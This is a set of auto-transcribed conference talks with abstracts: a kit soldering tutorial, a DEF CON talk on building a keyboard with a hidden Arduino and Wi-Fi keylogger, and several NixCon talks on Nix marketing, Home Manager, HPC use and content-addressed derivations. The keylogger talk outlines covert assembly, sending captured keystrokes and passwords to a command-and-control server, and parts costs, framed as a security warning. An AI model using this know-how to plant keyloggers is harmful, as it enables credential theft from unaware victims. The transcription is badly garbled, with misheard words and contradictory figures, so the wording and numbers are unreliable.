want to move a little bit as quickly as possible without being um without creating errors or making a mess all right now we're gonna cut the leads off this is where you need to be wearing your safety goggles and then some people like to go back I usually like to do this and hit the the cutoff part with a soldering tip again just to get the solder basically the wound that was left behind by the cutter just to make it nice and smooth but you know that's your option and the switch is also through hole you can put it on the front or the back I think since you know it doesn't really matter putting it on the back means you don't have to see it it leaves the board looking kind of nifty so you just you can just push it through those three holes here if I can get that stick in there right the leads are really short on that on that switch and so here's a good example where you want to get one of the pins soldered and then maybe you know just get one soldered here and then maybe check and see make sure the other three are the component is lined up because you know while only one pin is soldered you can reflow it very easily and move the component around a little bit this is important when you're doing like a chip that has a lot of pins is you just get a corner tacked down and then you can move the chip around just a little bit by just reflowing that corner and then once everything's lined up you can go ahead and solder down the rest of them but it's even useful for just a little switch like this there's a lot of play in those holes you can move that the switch around a bit so it just helps you line it up nice and straight all right all three pins of those and that switch is just an on-off switch it just it just opens the circuit between the battery and the two LEDs and now these are not just regular old LEDs they actually have a little a little circuit inside of each of the things they're in an LED a 5 millimeter LED package but there's a little circuit in there that actually cycles three different LEDs inside the package so each of those package while it looks like an LED it's actually three LEDs and then a little circuit that will make some cool flashing patterns and we're gonna get this coin cell open, a lithium coin cell, I'll show you how to install that. These are packaged really well because the manufacturer of the batteries doesn't want them shorting out and causing any trouble so they completely encapsulate the the battery to keep it safe. Anyway we take that and we flip the positive side up, I'm gonna show you there's a little plus on the top, flip the positive side up and that obviously means the bottom is ground and then slip it in there and the part of the reason why we tin that pad underneath the clip is because the center pad actually becomes the terminal and there you go that's a bad buddy nice beautiful blinking lights, it's very colorful and the lights blink quickly and then slowly and different speeds and if you leave it on for a few seconds the colors will get out of sync which makes it look a little more discotech, it's pretty cool. Okay so that was pretty cool so I said we would talk a little bit about just give you some of the keywords about about removing solder, if you get if you need what's called rework meaning something's already soldered and now you need to rework it or reflow it you need to heat the solder up so that you can take the parts apart sometimes you want to remove the solder so you can use this thing called solder braid which is basically just this really finely braided wire and it has a lot of flux in it and it'll suck if you just put it between your iron and a piece of work once it gets warm it'll kind of draw the solder out of the work you can also use a solder sucker one of these guys right here so you create a vacuum in there and then when you trigger it it go you know it sucks the solder out and so so yeah I wanted to point out when I did that a couple little chunks of solder flux flew out of there and you do not want to eat that or leave it where a child might eat it okay if you get that on your hands like I just did you want to wash it off before you eat or you know floss or whatever you might do that might get in your mouth all right yeah so braid suction and just remember you're gonna need more solder what either of those things you're doing you need more solder you might need flux again you know you'll you'll figure these things out of you get to them just don't be afraid to use more solder don't be afraid to get some flux going on things when you need it or add more solder to get to get the flux melted in there all right so hopefully this is useful there are a lot of resources online you can find about soldering if you have any questions you know hit us up here at Hacker Boxes yeah and like I said I hope that was interesting I hope you're open to soldering some more projects you know we sell a lot of kits at hackerboxes.com and there are a lot of fun things out there to solder even if you don't get them from your actual like kits just things that you might want to rework or modify or or try to repair you know it's a like I said it's a very handy skill I hope you enjoy it thanks for thanks for spending this time with us take care
Learn to Solder with HackerBoxes. Assemble your very own BadgeBuddy. HackerBoxes has updated a special edition BadgeBuddy soldering kit for DEF CON 28 SAFE MODE. The BadgeBuddy is a simple and fun kit to introduce basic soldering skills. Once assembled, the blinky mini-badge PCB can be hung from a conference lanyard, backpack, purse, belt, etc using the included bead-chain. The BadgeBuddy uses self-cycling rainbow LEDs for a reduced bill of materials requiring no external control circuitry. The result is a very nice colorful effect that is still simple enough for a first time soldering project. As in past years, the BadgeBuddy is free (as in beer) and in light of DEF CON 28 SAFE MODE, HackerBoxes will send it directly to you, anywhere in the United States, for only $1 S&H. If you do not already have soldering tools on hand, HackerBoxes is also making a set of basic soldering tools available at cost. Both can be found at HackerBoxes.com and can be ordered now to ship starting on July 20. Orders as late as July 25 should still be received in time for DEF CON 28 SAFE MODE, but earlier is always better in light of recent postal delays.
10.5446/50654 (DOI)
Ok, welcome to a talk on KeyPress Hack by Farid Perez, Mauro Eldridge and Luis Ramirez from DC5411. Before we start I would like to make a brief introduction to both our talk and the speakers. My name is Mauro Eldridge, I'm an Argentine hacker and I work as a cybersecurity architect. I'm the founder of DC5411 Argentina and I was a speaker for DEF CON, DEF SIGIRIA, ROADSEC, RASIL, DRAGON JAR COLOMBIA, POSCO NAYRAN, TEXAS CYBAL SUMMIT, among other conferences. Now my co-speakers are going to introduce themselves. Thank you Mauro. Hello everyone, my name is Farid Perez Aes, I am an Colombia hacker, system engineer and master in telecommunication. I work as a professor at the University of La Guajira and I am a member of DC5411 group. Also I'm being a speaker at Dragon JAR Colombia. I'm now a DEF CON in this village. Thank you Farid. Hello everyone. My name is Visan Ramire Vendoza from Colombia. I am an electronic engineer, hacker and computer security and artificial intelligence. I'm a teacher at the University of La Guajira. I'm a speaker at Dragon JAR Colombia. I'm a speaker at DC5411. Well, the objective of this talk is to show the assembly of a bad USB device discreetly mounted inside a keyboard. With the ability to send the victim's keystrokes over the internet, like a remote keylogger. This talk focuses exclusively on the construction of this type of artifact and includes a video demo at the end. This is the tampered keyboard we are using. As you may see, it seems at first glance like a pretty normal classical keyboard. But well, it isn't. Now my co-speakers and friends Farid and Luis are going to explain the magic behind this electronic tampering. Thank you. In the first play, we have the keyboard. You can choose any type of keyboard that has a USB connector in order to not see much of the alteration that we are going to make. The ESPH2CIPCIP Wi-Fi module will allow us to connect the Arduino to an internet connection. In order to send the keyboard data to a database in MySQL, in order to have a story, everything captured on the keyboard. To optimize the site, a watch decided to use the Arduino Nano so that it can be easily hidden on the keyboard and the L-sum, J in the translation of the keystroke to be stored in the MySQL database. A standard USB cable, which USB mini-vehicle it replaces, the keyboard cable, since it must be connected to the Arduino through which all the information must pass in order to apply the key lawyer. To receive this information, we will host a Q server which PHP MySQL and PHP MyAdmin. In order to receive all the values entered by the keyboard, we will also have the Arduino programming interface where we will enter the code that is necessary to interpret if of the keystroke emitted by a keyboard, it must be sent to a store, it in the database. In this image, interface Arduino IDE in the PC. And some sign, very important and very fundamental to have a lot of patience. To a kid good, restored bacon, this neighbor comes out the first thing, and on many occasions it does the opposite of what you expect and even more so when you organize the circuit and the solder becomes damaged or some sign very unexpected happens. Taking in account the hardware hacking 101, we have the plans that are completely the component usage in the project where if we want to do it ourselves we must have a normal K bar or the model must use it in your country. The wireless network component for Arduino ESPH2-CIP-CIP and Arduino Nano and standard USB cable, a C2 server, the Arduino programming interface on the PC and above all, most important have a lot of patience. In this diagram, it is possible to observe the scheme tab over keyboard has because it represents, have the represent attached, is shaped and each of the components detailed previously in order to the respective operation to obtain the information of each key entered by the BT. We have the connection diagram of each of the pins, be with the Arduino Nano, the wireless interface for the Arduino ESPH2-CIP-CIP and the keyboard where they indicate exactly where the connection must be made for its proper operation. On the connection card for the B board there are many drawbacks at the time of welding and first contact in each of the terminal of side connection. In the same way when it is not having the membrane and not making contact it will work regularly because it will not make enough contact for the very guide each of the pulsations may. You have in the image the representation of each of the components mentioned above for this respective assembly and operation. A image of the aforementioned cards fully operational. Here we are verifying either keyboard or recognizing the computer. In the graphic we can observe the or modification did not alter the computer recognizing of the keyboard. Here we are already assembling the keyboard for the parchment testing. When a key is pressed it joins the connected card rows and the column with the data to the column this in addition to going to the computer. It also reaches the Arduino it takes read of the continuity which way for the signal to send to the Wi-Fi the model. This is how our the keyboard would look like on the inside. As we can appreciate all of the pieces are achieved and easy to gain into the device. In the same way much and we are not saying that the read can suspect anything. Here is the schematic the Arduino NTN speed connected serial which means that one that is transmitted and the other received peri-pull-sation is received by the keyboard board. The 13 don't waste the termining which are the rows and the column of the keyboard PCB. Where a key is pressed is where and the close that is the wrong and the column are in contact. The Arduino also waits for click. The coding is with me the translation to know which key pressed it. The ESP also have received peri-pull-sation be due to the Arduino not having a node on the connected on the PCB of keyboard. To simplify the coding with you the keyboard library see it manning the same principle in GIN to be to which pin are rows and which are columns. Here we can see a part of the ESP configuration ready and waiting for pulsation to send them to be the database. Here is the most of the Arduino interpreters every pulsation and tor-in-it respect the charter to be stored in the variable which will end in the database. Because request to see to server. Here the graphic will observe the code and save the information to the database. Now that you know how to build this bad USB keyboard let's take a look into how to use it to exfil-tray data. How does it works behind the scenes. So far we know that the keyboard it's tampered with an Arduino hack which acts as a buffer for the user's input data. This Arduino hack is connected to an ESP8266 which provides it with network functions. Basically it connects to any open Wi-Fi connection to relay the data. So whenever the buffer is full or certain time has passed the buffer closes itself and uploads the data by issuing an HTTP post request to our server to the common and control server. Then on the server a PHP script is listening and parsing the data and sending it to our MySQL database. So you might ask yourself what are all these 24 28 rows. These are sessions and how do this keyboard manage the sessions. Whenever the buffer reaches a certain amount of data or a certain time of inactivity passes the buffer will close itself and we create what we call a session and upload it with a number. Whenever it is uploaded the buffer will be cleared and then a new session is created. So for example here let's take a deep look. Here we have session 11 where the user attempts to open gmail.com. Then certain time passes and the user jumps into another task as you may see on session 12. He starts writing anything else, a document or whatever, an email. Then on session 13 the user came back to gmail, he jumped back to gmail sites and entered his or her credentials, his or her email and password. So how much will it cost to build this kind of device? Not so much actually. We have taken into account the most expensive prices available and even though that it is not expensive at all. You can have a classic keyboard for $9 or $12, an Arduino Nano for $7 to $13 and the ESP8266 which is a very popular product for $10 or $12. Let's suppose you want to have a cloud instance for your command and control server, it will cost something around $5 a month. So for $30 or $35 you can have your hardware hacking cluster. Now it's time for a demo to see how the keyboard might work on our controlled environment. I'm going to jump into conclusions and questions and answers. You have to always be wary of any new device whether USB or not, anyone and I say anyone could be a victim. Let's be honest here, will you have been able to detect this temperate keyboard in your environment for example if it was lying around the desks of your office? What makes this situation worse overall is that with a few dollars anyone could build or even buy a product of this type. Watch out for counterfeit hardware, just some days ago fake Cisco switches were found deployed in production environments and nothing less than core switches. Think about it, if we were able to produce these apparatus with so few resources it is safe to assume that an entity with greater resources could produce them on a large scale. So if you want to get in touch with us at GitHub feel free to add us at Mauro Eldridge and DC5411 or on Twitter you have our handlers here, we are always happy to talk about hardware hacking and hacking in general so don't be shy to join. And we are here to answer any of your questions so we hope you like this talk and we are looking forward to see you again next year. Thank you.
In this talk we will see the assembly and use of a modified BadUSB keyboard with an integrated DIY physical keylogger. Using a built-in WiFi module, this keyboard is capable of sending user keystrokes to a remote server and storing it in a database. Both the piece by piece assembly, its diagram, and its programming will be demonstrated. Also there will also be a live demo to demonstrate its operation. This talk is recommended for both novice and experienced users alike.
10.5446/49873 (DOI)
Okay, the next up, well actually, now currently, we have how Nix grew a marketing team by Garvis. And this is about marketing and non-technical work is all too often an afterthought for developers, or worse is actually viewed as something like negative. So Rock really wishes this was in the case. Having clearly defined problems, audience and strategy should be as important to us as having clean and tested code. You know, this is important for Nix, this is important for any project that aims to succeed. And if you're not familiar with Rock, he believes he started using Nix in 2010, and he is a senior engineer at Twig.io, and he did the first Nix print in Slovenia in 2013. And yeah, that's the head of the marketing team. So take it away. Hi everybody. I hope you can hear me. How do I actually know? I don't know. It's not yet, because I don't hear you. Should I continue? Okay. Hi everybody. I think now you can hear me. Okay. So it's a privilege to be giving you this presentation. And I don't just say this to everybody. I really mean it. And it's for a simple reason. It's because this concept of family belonging, team, it's personal to me, and it's as much as it's personal to you. In the past, I did presentations at meetups, conferences, and there was always, those presentations were always at conferences of other also great technologies, but it always felt this distance between what they do and what I do. So this talk is really special for me. I mean, it's really special to me because I'm talking to an audience that is just like me. I feel home here. So thank you. So today, I'm going to be talking about how Nix grew marketing team. And yeah, I was always passionate about getting Nix in hands of other developers. Other people, not only developers. So after I actually moved to Berlin for my first Nix job, this was in 2014. And after one year of experience of working with Nix, I wanted to do this more often. And I went to every meetup. I tried to talk to every developer there in Berlin. And that's a lot of them and try to convince them to use Nix. I was partially successful, but it always felt that this distance as I was talking before. And for the reason, as it usually happens in Berlin, you go for a K-Bop with a fellow Nix person and suddenly you end up organizing in the Nix conference. So we organized a Nix conference. And why is that important? Because there I talked about making Nix friendlier for beginners. I thought Nix is great already in the shape it was. But I wish I would be able to fix only a few things. And there were a few things that I emphasized there. One was this first contact with everybody getting to know Nix, which is the installer and the website. And yeah, so the installer and the website. Then there was the command line. I think it was a bit too harsh now rewatching the video. And then also the documentation. So already back then this was clear what we need to do. And I gave a similar talk in 2018 while I was working at Mozilla and trying to introduce Nix at Mozilla. And how I actually introduced it at Mozilla and what were the pain points. And I think what I remember from that talk was that at the end I said, if there is one thing that we should actually change is actually the website. Because that was the main complaint that I received time and time ago. It all boiled down. It was not the only. But it all boiled down that either they didn't know how to find the documentation. So the website, this entry point was always the problem. And this passion of me trying to introduce Nix to so many people, it got me into this really scary place. And we call this, some call it marketing. And I don't see it anymore as a scary place. But I quickly found out that many, including my past self, have a very negative view of marketing. It kind of ranges from I don't care about it and marketing is evil. And actually, this is for a good reason. Because a lot of marketing is especially that the one we perceive and the one we acknowledge is actually the deceptive one, or at least it feels that way. Yeah, and that's not all of the marketing that there is. It doesn't have to be that way. So, yeah. So, it doesn't have to be this way. So, in my past, there was, as I said, I was in the item care camp, where I didn't care really about marketing that much. But there was a like a moment which I want to share with you, which got me over, which started the process of me actually thinking a bit differently about marketing. And this was the moment when I encountered this number. And 59% is the percentage of our behavior that is controlled by our subconscious. And that fascinates me. It's not 20. I know I knew that there was some subconscious involved in our decision. I thought it's lower. It's not 20. It's not 50. It's actually 95. And that shocked me. And this is actually across, this is applicable to every human on the earth. It's not something that it's only depends on where you're from or how good education you have. No, these forces that are in our subconscious actually come from evolution. So, that's why it is global. And these forces we usually call human behavior. And it kind of, it feels like there is this puppet master and we are the puppets. And that makes, and even when we die, our children come and this puppet master controls them, the same puppet master. And this is very, I felt very uneasy. I thought I'm a rational person. I thought I'm an in control person. And that put everything on the, that turned everything on the head. So, but on the same time, I acknowledge that this is a powerful, powerful knowledge. And, you know, with everything powerful, you can use it in a good and a bad way. And marketing, especially the advertisement, I guess that's where the evil part comes from. They take advantage of this, right? And I said, it doesn't have to be evil. I'll try to give an example of good and bad marketing, or at least hope I don't mess this up. But let's say, you know, you go on a first date, you don't put just the first t-shirt that you find, you actually put a bit better, you put something better on yourself. And just, you're trying to present yourself in the best light possible. And that's already some sort of marketing, so to say, right? Because you don't want to lie, you don't want to deceive, but you want to put your best. Because in our human nature is that we take our first impression really seriously. You know that if you're not, at least in school where I went, if you're not good in the first semester, this is where you get the label for the rest of the time in the school. So, first impression is really important. And there are many more other human behavior things that we need to be, take into account. And even before, I'd like to consider myself a problem solver. I'd like to see a problem and try to solve it. And the problem of adopting or growing the adoption of NICS was a problem that I couldn't solve. Like, how can we solve it? And this is what, this is one of the things that put me on the path of marketing. And, you know, many books after, and many talks to people and so on. This led me this year to create a marketing team. I mean, I was only the person to announce it and then others joined. But this was important because you cannot really do the whole marketing process by yourself. You need to be a team, especially if you want to do this in continuous way. So, but before we continue, that's actually really important. I'd like to also discuss what marketing is. Like, it's, I know it's a bit of a going off the rails, but I think I didn't address what marketing is. And one of the many complaints I received when talking about marketing is that the language that marketeers use is unfriendly or very foreigner, right? So, and that is because a lot of resources that you can read on marketing and there are many are not, are written in a language where they're measuring customers and sales and, you know, different things. But there are not many books written about marketing on open source. Actually, I didn't find, I found any. There are a few blog posts, there are a few presentations, but on this topic, they are not made, not many, or at least not specifically mentioning the marketing, but kind of going on, taking different aspects of it. So, I took, I composed a few definitions because there is also not one definition of marketing, but I took a few definitions. I kind of tried to combine it and I hope and translate it, of course, because I don't want to call our new Nix users customers. And I don't want to talk about sales, but for the purpose of marketing team, the Nixus marketing team, I think we can say that marketing is a non coding activity that drives adoption. So, everything non coding that will drive adoption is in, is in area of marketing, or it's touching the area. It's most likely marketing is not the only marketing team will not be the only person, the only contributor to this, but it's, if there is nobody, like this needs to be done. So, I think this kind of answer, and that's also the reason why I give the marketing team the marketing name, because it's all about the adoption. And importantly, I'll say it again, there is a good and bad way how to do marketing. I don't want to deceive people. I don't want to put bad ads or things like this. I just want to give Nix a chance. I want to prepare Nix to be, to dress well Nix for its first date, basically, right? So, without out of the way, I'd like to take you on a journey what we did in the last six months. So, it's a bit more, but in the last milestone. And before that, I'd just like to thank that this was not only my work, but there was like a, there is a team behind it, right? You probably met it if you followed our minutes that we try to publish as soon as we have the meeting and have the time to write it, but importantly, for each of these milestones, we have a certain goal that we try to focus on, and from there we define certain tasks. And for our first goal, so this was actually our, our first few meetings was what are we actually going to do at marketing, right? And there were a few ideas thrown around. But our goal that we kind of decided on was we need to change NixSys.org. We need to make it look a modern and maintained project and ready to be used in production. And then we kind of develop a three phase thing, three step thing that we will follow. And first is we will, we need to define in order to do any kind of redesign or even kind of have any marketing talk, you need to know your audience and the use cases in case of the Nix and XOS. And here I want to emphasize actually that we only define this primary use cases for NixSys.org. Nothing changes in the code itself. It's only what we will put higher or what will have a higher priority over other things. The next thing is you cannot redesign if you don't do, if you don't have a content and structure of the website. Usually this comes together. Although in our current case where we are redesigning the existing page, we can already adjust the content with ideas that will drive the redesign later on. So we did that. And we redesigned and the last step which is still a bit in the progress, it's the redesign of NixSys.org. So the actual writing the CSS. So going back to number one, what was this, well, decided? So first on this part, nothing is really decided for a long term, which each year we will reevaluate whether our audience and use cases are still valid and adjust. So one aspect of marketing team we need to listen to everybody. And that's why we put all the minutes out and we do listen to the feedback you give us. We might work on it a bit slower in a different pace in a different order, but we do listen to it. We do take it into account. So our primary use case that we put now was for Nix, we use the primary use case for Nix. So the main audience for the website is beginners and decision makers. So the one who decides whether the Nix is actually good enough to be used in their company. And the primary use case for Nix is development environments. Kind of to translate it to the Nix developers, this means Nix Shell. Everything around Nix Shell. I think it's the most polished solution that we have out there and the most underrated that we don't promote enough. And we even have a talk. A lot of talks mentioned this, how great Nix Shell is. And I think we need to, the website needs to reflect this as well. And the use case for Nix OS, the use case for Nix OS is cloud ops or cloud deployments, building cloud images, something along those lines. And this will change, I am sure. But we need to pick one. And I think the building Docker images, building EC2 images, it's the most polished solution we currently have. If this changes, we're really all happy. Like this is something that it's in flux. But this kind of drove the reorganization, especially the landing page, what's on it and what's not, what's at the top of other pages, that all drives it. And if you remember, and I welcome you to go on the Wayback machine or time machine.org and look how the website looked in the beginning of the year. And then kind of fast forward to today and compare it. And I think the change is simple. Now, what we said in the beginning, and I was very cautioned, is that we are not looking to do a perfect redesign and do a perfect change all the time. I think what's more important is that we do the change incrementally and always on the better. And eventually we'll get to the better place. And redesign, what was the goal of the redesign was achieved, because we didn't look for a perfect website, perfect design that will be always there forever. But we look for something that will look modern and maintained. And with the content, we are, I think, yet to provide the feeling that this can be used in production. But more on this later. So I think we are ending with the 2009 release happening soon. We are ending this milestone. And we are partially, we mostly succeeded. I think we can still do a lot more on being more explicit that this, the Nix and NixOS is actually a tool that is being used in production and in other, in visitor can also use it. So I'd like to look for the next period. Importantly here is that nothing is set in stone because each half a year group a bit reorganizes and people in the group decide what to work on. But either these are some issues that we have in our bucket to kind of, that we think we should work on. And the goal will be to make onboarding easier. Now we have a website, now we have a base. Now we need to make the whole onboarding experience easier. And so one of the things is we want to serve fresh cloud images. So each successful evaluation should, NixOS evaluation should push the images to EC2, not only the fresh EC2 image, but we want to expand this to other cloud providers, especially the top three providers, let's say the Google Azure and the EC2, right? So at least that, if not more, why not? Because if we want to be seen as the cloud, really good for cloud, building cloud images, they should be, they should be easy to start, like we have now with the click of a button. There is another idea we have that, I mean, it's a clear idea that we need a language specific tutorial. So on the learn page, if a lot of people come to us and they, you know, I want to use Python with Nix, how do I do this? There should be a visible, on the learn page, there should be a visible language. And I thought there were many talks this conference on Java ecosystem. And I hope this will end, what is, Scala. So I hope, you know, we need those instructions in one place, and actually outside the manual, right, geared towards the newcomers. Another idea is a prominent Docker support. This is more for the purpose of people trying it out. Using Docker as a vehicle, using other technologies as a vehicle to try out Nix, will make onboarding much easier. Now, prominently, we can dive deeper after the talk why the current Docker is not good, but we need to make it easier to try Nix. And Docker might help us there. Oh, yeah. So I want to, my video is here covering this, but exposed internal community communication. So all the teams we have, how they communicate, what they do, there are many minutes scattered all over the places. Someone can help someone. I want to, we want to bring them and help people who already started using Nix and want to contribute, and give them the roadmap, how and where to go to find what's being in development currently in Nix, right? So what's the state of RFCs and things like this? What's been talked about? Next on the lot, we want to have job section. I think Domen yesterday mentioned, you know, this tricycle where you have the industry developers and, you know, everything feeds into each other. And I think having a job section will, well, first make two things. It will it will make you make it easier for you to find the next Nix job. And it will also, it also is seen very production-ready because everybody that's, you know, adopts Nix will also want to hire. One of the things I already started is actually gathering the success stories and white papers on, you know, and I hope to do many more. And, you know, once I gather at least five, five, you know, eight of them, I will actually will open this section, the website, where people will see how Nix is used in maybe, you know, really obscure places and how it's bending what people think Nix can do. And then there is commercial support. I think everybody will get stuck with Nix, especially in the beginning. And they look for companies to help them. This is, of course, a bit, can be a bit, how they say, controversial thing, but having a list of Nix providers that can help you, either personal or companies in a fair way. And I think emphasis on being fair, right? So everybody should get the same space and so on. I think we'll bring, we'll address the production quality from the previous milestone that we had. So there is many, many things to work on. And not all of them are, you know, what you would assume are marketing. So, you know, building fresh images. There is a lot, there is some coding, although not on Nix itself, but there is some coding and working with infrastructure. So I would welcome you to join us. We are still open for another two weeks for Amateur, whether you hear me, but I lost all the connection to that. But I'll try to go forward with the slides quickly through it. But as I was already at the end. So, yeah, so please join us. We are still open for another week. We only invite new people to marketing team for a week for every end of each release. So let's ping me on IRC. I'm always Garbus on IRC or Twitter. Or just, I think also on discourse. So on the end, I'd like to answer just this question. Do we really need to do marketing? I think we do. We need marketing. Every successful project needs marketing. And if Nix wants to be successful, we need to do marketing. Marketing is a lot of work. It's not because it's hard, but it's coordinating all of this, making sure all the images are there. So don't underestimate underestimated. And with this, I'll end up. And I hope I see you. Okay, it seems we only have one. And it's honestly just like a cheeky comment. I would say it's a good sign that you don't have many questions because you really were very thorough in your presentation. So, okay, I'll read the top to you. So how about playing a tree for each person installing NixOS? Sorry again. How about planting a tree for each person installing NixOS? I'm not sure if this is going to help NixOS adoption, but if it does, let's do it. Okay. So on that note, I would like to thank you. I really love the moment, like you mentioned, that we don't have control over lack of subconscious. And like within awareness, you can use it to your advantage. Like I personally believe like, at least for myself, I have pretty good hold on my like subconscious communication. And you usually can sort of tell that by how people feel just by meeting you. So yeah. Like you. I find it actually a lot of times, we think we do have control and we most of the time make excuses for our subconscious. But it's good to be aware. I think this is always, once you're aware, you can actually control it. You know, like, and like this field is just enormous and I'm always impressed that I didn't know about it. Yeah, throughout your talk, you basically guide us through a lot of your awareness on the whole situations and pulling that back into why a marketing team is necessary. So yeah, I would like to thank you for starting this initiative, the marketing team and doing all this research and just really everything. Yeah. Thank you so much. Thank you. Yep.
In my talk I'd like to go over: Why Nix community needs a marketing team What have we been up to in marketing team in the last 6 months What are the plans for the next 6 months Marketing, and non-technical work in general, is all too often an afterthought for developers or worse it is viewed as something negative. I really wish it weren’t the case. Having clearly defined problems, audience and strategy should be as important to us as having clean and tested code. This is important for Nix. This is important for any project that aims to succeed.
10.5446/50704 (DOI)
Okay. Next up is Ryan Mulligan with Home Manager template. So this is his project which provides a quick start template for using Home Manager in a more reproducible way so you don't have to install Home Manager and it uses Pinging. Pinging I mean. Hi, my name is Ryan Mulligan and I'm going to talk about Home Manager template. You can visit it at GitHub, Ryan TM, Home Manager template. Why would you want to use Home Manager for stuff? Home Manager lets you reproduce your config, your user configuration on it instantly on new computers and also on multiple computers so you can have consistent configuration across computers. It also lets you leverage common configuration, a common configuration ecosystem. So Home Manager maintains a set of NixOS-like modules that lets you use other people's work and then lets us have less duplicate work. What is Home Manager? Well, it lets you organize your home with NixOS-like configuration. So there's a file called home.nix which is very similar to your configuration.nix in NixOS and then there's Home Manager switch which is like NixOS rebuild switch for switching to a new configuration. It does not require NixOS. You can use it on Linux systems, any Linux system to configure your user environment. So what's Home Manager template for? It's for people that are allergic to installation instructions, people who don't like state and people who want maximum reproducibility. So let's get into the details about how you can use it. What is Home Manager template? It's a template file structure that basically is just a Nix shell where Home Manager is installed and all the dependencies are pinned so you don't need to install Home Manager. So here's how you use it. First, you install Nix, then you go to Home Manager template, repo and you click use this template. Then you clone your repository on your computer that you want to configure. Then you can update the dependencies to the latest version by running the update dependency script and then you can edit home.nix and then switch to your configuration by doing switch shell command. So here's an example of minimal configuration that you might have when you start out. So first you need to specify your name. This is a Nix file and your home directory where you want to configure and then the state version that you're currently on for Home Manager and then you need to specify that Home Manager will manage your shell. This is necessary with Home Manager template because it doesn't install Home Manager so you need to have some other hook into Home Manager's hooks. That one way to do that is to have it manage your shell and then you can install various packages. There's lots of other configuration options available in Home Manager and they're available in the manual. So after we have this home.nix file created, then we run switch and then in my example I have installed the package Kousey. So we can say now we have Kousey available, we can say hello Nix Con20. So that's the very basic quick overview of Home Manager template. It's a very simple wrapper around Home Manager so I recommend you check it out. It's very quick to install and then also check out Home Manager which is a great project and the manual for Home Manager has all the details about additional configuration options that you should use. If you'd like to look at the slides for my talk, they're available here and feel free to email me with any questions you might have or any comments you might have. Thank you very much for your talk. Thank you to the organizers and all the attendees.
home-manager template provides a quick-start template for using home-manager in a more reproducible way. You don't have to install home-manager, and it uses pinning.
10.5446/50705 (DOI)
Okay, everyone go off for theophane or I'll be really disappointed. Okay, next up is nix from the Dark Ages without root This is by Rohit Goswami in this talk is Centralized on comments on the trenches of high-performance clusters on working with nix on kernel locked in systems without period support. So go on Good morning, I'm Rohit Goswami and I'm gonna be talking about nix in the Dark Ages without root It's a short talk. So I'm just gonna run through this quickly. So first and foremost, hello nix con This is my first nix con and I'm super excited to be here. This is me. We can you can check that out later So what's the big picture? What is going on? Well on the right? You'll see an academic cluster picture from GE research and what's the problem really? Well, there's no docker if you're very lucky or in some places you might have singularity You won't have any user space support, which means you can play around with P route and It probably runs into s or something as you can see in the lower right If you check this out later, then you probably also be able to see that these are typically quite powerful That's the whole point of using them. There's a lot of power in these clusters and there's also network file system typically luster fs or cluster fs or even in some cases nxs and There's always a resource queue Either through slum or previous torque or something like that Again, if you're lucky you're managing very you might find support for lmod, which is a path helper as some of you might know and Why is this like why does it run an old centOS? Why you know, what's going on? Well, it's a necessary evil users can't be trusted There are a lot of resources which are being consumed and you have to track these because people pay for them But you know users do need new software developers, especially a lot of my work involves a lot of high performance coding and I need to know reproducibly my stuff works so next is the solution clearly and It's been adopted by some in the scientific community It's been around for a long time now. It's 16 years. Yeah, but does no one use it? That's not exactly true There are classes that use it. They have good support like Rick had even has an ECM paper on it and Flatter Institute and compute Canada also support next but what if no one cared? What if nobody cared that you have problems or you like next well, then you end up here in this presentation So where are we exactly? Well, there's a whole lot of user installed junk to the post which accompanies this and not going to get into all of that But the basic concept is do something to get mixed up in anything unholy things to path You know prune bits of the source code just get it to install somehow and then that makes reinstall itself, right? so I'm not the first to think of this there are these two excellent repositories which I liberally looked into when I was doing this and Unfortunately, you know none of them are up to date hence So are we done is it over? Well, no even for the short presentation is still a lot of time. So not quite So what went wrong? Well, if you follow along the methodology which I covered in the post then well you basically because it's you can't utilize the cache and You're basically running on the login node and you're wasting a lot of resources. Yes, these resources can be tracked down to you You can be censored for it. So, you know in that sense, you're still responsible, but you know, this is not great Right? So what do we need really? We need better permission handling. There was this incredible moment when the permissions were So poorly said that you actually have to run a little watch command, which is terrible and of course, you know, nobody should be 777 in their permissions, but still Okay, so there's another issue which is that the lock is not necessarily released at the same time especially when you're building a large Package and one of the quote-unquote fixes is basically moving the package moving the entire directory and then we're building it Which is clearly not ideal, right? So where are we really? Well Bills and queues we need to know who's building what and we also need to be able to run on the entire cluster Not just the login node, right? So future directions. There's the union mount proposal Which essentially is meant for efficient private stores, but it's a step in the right direction It would reduce compilation. It doesn't actually replace the global store. There's a discussion here on Reddit And my own personal goals like what I want to do well, I was thinking of looking into hashing relative to a prefix and a cleaner setup definitely it is not I mean, it's a long blog post and it is not pretty right now to do this and hopefully I'll be back next year with more complete Project really I mean with more information and with a better approach to this I have a couple of years on my PhD and I plan to use NICs exclusively. So yeah, I'm definitely going to be looking into this March, so That's the end. Well, not exactly. There's the biography and thank you. Thank you for your attention.
“Nix from the dark ages (without Root)” Rohit Goswami · Lightning Talk (5 minutes) Short comments from the trenches of High Performance Clusters on working with Nix on kernel locked-in systems without proot support.
10.5446/50706 (DOI)
Okay, hello, we are back with lightning talk. So if you're not familiar with lightning talk, it really is just simply a five minute talk given so it has to be very quick for that person and I believe most of these are for your corner So our first lightning talk is called content address derivations. This is by Theo fein Hossmit and I don't actually have an abstract about that. So I will just let you keep the clip Hello everyone, I'm Theo fan from twigayo and I'm gonna talk to you today about content address derivations in leaks Which is something I've been working on for the past few months with the help of generic son and echo in particular So before explaining what content address derivations are and why they're awesome Let me get back to the classical derivations in leaks which are input address derivations So the distinction between input and output content address derivations has to do with the way Nicks computes the hash of the output path of the derivation rather the output path themselves Which are the thing with a big hash under slash nick slash store. So for input address derivations What happens is that each derivation like hello.jrv has a bunch of inputs be their files or other derivations or Strings in the derivation including the build command itself or the environment variable That's gonna be available here in the in the build environment and all these inputs will be assigned a hash and Then nicks will take all these hashes put them in a box shake the box and Hatch the result and This is gonna be the hash of the hello derivation and from this hash nicks will be able to compute the different output path of the derivation So This is nicks as we know it how nicks has been working for the last 15 years and It's really cool because if I somehow change my input JCC It's gonna get assigned a new hash and transitively hello is gonna get assigned a new hash and so nicks know that it has to rebuild both JCC and hello and But the old and the new can coexist in the store. I can roll back. I can do whatever I want That's wonderful The thing that's not wonderful though is that maybe I'm a perfectionist and I just happen to be skimming through the GCC code base and I found a typo in a comment So I fix that because I can't leave with the idea that one of my dependencies has typo in a comment But by doing that I changed The hash of the GCC derivation and when I have to rebuild GCC but more importantly I have to rebuild my own hello project and I don't want to do that because what I know is that I just change a comment which means that the GCC executable will be the same and I Which means that I know that my hello Output of my hello dependency will also be the same because it's it had in a way the same inputs The same hello.c source file the same batch derivation the same build command and the same GCC binary But nicks doesn't know that just Change in a comment in that meaning it doesn't know what a comment is anyways all it sees is that I 